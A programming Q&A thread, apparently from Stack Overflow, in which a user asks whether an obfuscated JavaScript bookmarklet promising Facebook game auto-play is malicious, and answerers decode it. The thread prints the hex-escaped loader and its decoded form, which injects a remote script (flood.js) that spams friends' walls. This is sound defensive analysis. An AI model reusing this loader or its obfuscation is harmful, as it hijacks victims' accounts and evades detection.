# Can someone decrypt this javascript

Tags: javascript

i found it in a forum that tell me that this code would give me auto play for facebook games but i afraid that this is not what they say, im afraid that this is malicious script

please help :)

```
javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);
```

Comment: Definitely *looks* like it uses obfuscation similar to malicious scripts.

Answer (score 12, accepted):

Let's start by decoding the escape sequences, and get rid of that `_0x8dd5` variable name:

```
var x=[
  "src","script","createElement","http://ug-radio.co.cc/flood.js",
  "appendChild","body"
];
(a=(b=document)[x[2]](x[1]))[x[0]]=x[3];
b[x[5]][x[4]](a);
void (0);
```

Substituting the string from the array, you are left with:

```
(a=(b=document)["createElement"]("script"))["src"]="http://ug-radio.co.cc/flood.js";
b["body"]["appendChild"](a);
void (0);
```

So, what the script does is simply:

```
a = document.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
document.body.appendChild(a);
void (0);
```

I.e. it loads the Javascript `http://ug-radio.co.cc/flood.js` in the page.

Looking at the script in the file that is loaded, it calls itself "Wallflood By X-Cisadane". It seems to get a list of your friends and post a message to (or perhaps from) all of them.

Certainly nothing to do with auto play for games.

Comment: thanks , im not very familiar with JS but your explanation is very clear for people like me sir , 

thanks so much :)

Answer (score 7):

I opened firebug, and pasted part of the script into the console (being careful to only paste the part that created a variable, rather than running code). This is what I got:

what I pasted:

```
console.log(["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"]);
```

the result:

```
["src", "script", "cx7 2eateElement", "x 68ttp://ug-rad io.co.cc/flox 6Fd.js", "appendC x68ild", "body"]
```

In short, what this looks like is script to load an external Javascript file from a remote server with a very dodgy looking domain name.

There are a few characters which are not converted quite to what you'd expect. This could be typos (unlikely) or deliberate further obfuscation, to fool any automated malware checker looking for scripts containing URLs or references to `createElement`, etc. The remainder of the script patches those characters back into place individually before running it.

The variable name `_0x8dd5` is chosen to *look* like hex code and make the whole thing harder to read, but in fact it's just a regular Javascript variable name. It is referenced repeatedly in the rest of the script as it copies characters from one part of the string to another to fix the deliberate gaps.

Definitely a malicious script.

I recommend burning it immediately! ;-)

Answer (score 4):

Well, the declared var is actually this:

```
var _0x8dd5= [
    'src', 'script', 'cx7 2eateElement',
    'x 68ttp://ug-rad io.co.cc/flox 6Fd.js', 'appendC x68ild', 'body'
];
```

The rest is simple to figure out.

Comment: Well I want to give you some million upvotes for figuring that out before me. But all I can give is one :)

Comment: Why doesn't the \x72 turn into an r?  Same for \x68 for h?  (I noticed it did this same thing in jsfiddle)

Comment: @jglouie: There are spaces left when copying.

Comment: Additionally, the external script loaded floods your Facebook wall.

Comment: @xzanrzk - see my answer for instructions on *how* I decoded it.

Comment: @xzanrk: I think you introduced some spaces when copying it. That initial array is actually `"src", "script", "createElement", "http://ug-radio.co.cc/flood.js", "appendChild", "body"` if you remove what I suspect are erroneous spaces.

Comment: @T. J. Crowder the hacker seems pretty naive to have named the file as flood.js lol

Comment: i dont know so much about js programming ,but thanks that js script i think would be injected to my profile if im not asking here :) so thanks so much sir :)

Answer (score 1):

Well your first statement is setting up an array with roughly the following contents:

```
var _0x8dd5 = ["src", "script", "createElement", "http://ug-radio.co.cc/flood.js", "appendChild", "body"];
```

I say "roughly" because I'm using Chrome's JavaScript console to parse the data, and some things seem to be a bit garbled.  I've cleaned up the garbled portions as best as I can.

The rest appears to be calling something along the lines of:

```
var b = document;
var a = b.createElement("script");
a.src = "http://ug-radio.co.cc/flood.js";
b.body.appendChild(a);
```

So basically, it is adding a (probably malicious) script to the document.

Comment: thanks so much for the help sorry i dont know much about js :)

Answer (score 1):

You most probably know how to decode this or how it was encoded, but for those that aren't sure, it is nothing but 2-digit hexadecimal escape sequence. It could also be 4 digit one using \udddd (eg. "\u0032" is "2") or \ddd for octal.

[Decoding hex string in javascript](https://stackoverflow.com/questions/4209104/decoding-hex-string-in-javascript)